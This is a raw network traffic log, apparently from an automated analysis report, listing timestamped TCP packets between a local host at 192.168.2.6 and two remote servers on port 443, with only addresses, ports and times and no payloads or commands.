                                                                                                                                                                                              Nov 24, 2024 13:39:48.352101088 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352138996 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352154016 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352165937 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352164030 CET4434981923.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352176905 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352200985 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352214098 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352260113 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352260113 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352405071 CET4434981923.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.352587938 CET49819443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:48.356326103 CET49819443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:48.356326103 CET49819443192.168.2.623.218.208.109
                                                                                                                                                                                              Nov 24, 2024 13:39:48.356348038 CET4434981923.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.356359959 CET4434981923.218.208.109192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.477802038 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.477832079 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.477839947 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.477864981 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.477874994 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.477888107 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.477927923 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.477997065 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.478045940 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.478071928 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.534734964 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.534764051 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.534828901 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.534851074 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.534877062 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.534925938 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.584323883 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.584343910 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.584561110 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.584584951 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.584717989 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.683098078 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.683109045 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.683144093 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.683168888 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.683176041 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.683249950 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.683286905 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.683286905 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.709378958 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.709403992 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.709486008 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.709506035 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.709580898 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.729258060 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.740758896 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.740791082 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.740861893 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.740883112 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.740907907 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.740926027 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758425951 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758447886 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758505106 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758521080 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758619070 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758713007 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758735895 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758781910 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758805037 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758830070 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758852959 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758873940 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.758896112 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.766418934 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.766509056 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.766522884 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.766634941 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.766654015 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.766680002 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.780986071 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.781009912 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.781071901 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.781090975 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.781145096 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.891901016 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.891922951 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.892004013 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.892023087 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.892121077 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.909684896 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.909703016 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.909781933 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.909800053 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.909842968 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.911123991 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.911164999 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.911236048 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.911473989 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.911488056 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.923681021 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.923700094 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.923774958 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.923790932 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.924063921 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.939124107 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.939145088 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.939208031 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.939224005 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.939273119 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.950524092 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.951397896 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.951416969 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.952028036 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.952033043 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.954049110 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.954099894 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.954176903 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:48.954201937 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:48.954212904 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.102093935 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.102602959 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.102632999 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.103159904 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.103164911 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.125169992 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.126347065 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.126365900 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.126560926 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.126566887 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.306222916 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.315563917 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.315587044 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.333359003 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.333390951 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.388212919 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.388237000 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.388295889 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.388312101 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.388600111 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.388614893 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.388622999 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.388781071 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.388817072 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.388864994 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.391784906 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.391824007 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.391891956 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.392076969 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.392086983 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.506551981 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.507184029 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.507241011 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.507711887 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.507720947 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.560411930 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.560497046 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.560574055 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.562001944 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.562030077 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.562041998 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.562047005 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.565798998 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.565850973 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.566021919 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.566265106 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.566273928 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.578896046 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.578979969 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.579027891 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.579729080 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.579744101 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.579754114 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.579760075 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.582875013 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.582937002 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.583003998 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.583204985 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.583218098 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.747219086 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.747247934 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.747339010 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.747366905 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.747646093 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.747662067 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.747704983 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.747827053 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.747862101 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.747915030 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.750889063 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.750935078 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:49.750997066 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.751163006 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:49.751177073 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.261873007 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.261893988 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.261966944 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.261986971 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.262033939 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.262576103 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.262582064 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.262603045 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.262739897 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.262777090 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.262974024 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.266361952 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.266396999 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.266586065 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.266773939 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.266786098 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.704044104 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.733114004 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.733136892 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.734317064 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.734380007 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.738549948 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.738626957 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.752155066 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:50.752167940 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:50.801321030 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.179085016 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.179709911 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.179774046 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.180193901 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.180206060 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.222677946 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.222707033 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.222714901 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.222738028 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.222748995 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.222759962 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.223037958 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.223059893 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.223109961 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.230848074 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.277704954 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.339957952 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.341355085 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.341411114 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.342062950 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.342082024 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.374604940 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.386652946 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.386686087 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.387353897 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.387360096 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.418946981 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.418972969 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.419020891 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.419028044 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.419040918 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.419083118 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.419101000 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.419116974 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.419142008 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.458673954 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.459239006 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.459270000 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.460001945 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.460009098 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.498682022 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.498704910 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.498805046 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.498838902 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.498917103 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.502913952 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.502984047 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.502999067 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.503015041 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.503063917 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.503329992 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.503350019 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.634840965 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.634865046 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.634943008 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.634980917 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.635962963 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.636038065 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.636307955 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.636346102 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.636363029 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.636378050 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.640081882 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.640116930 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.640357971 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.640512943 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.640523911 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.786669016 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.790999889 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.791151047 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.792810917 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.792833090 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:51.792845964 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:51.792850971 CET4434983213.107.246.63192.168.2.6
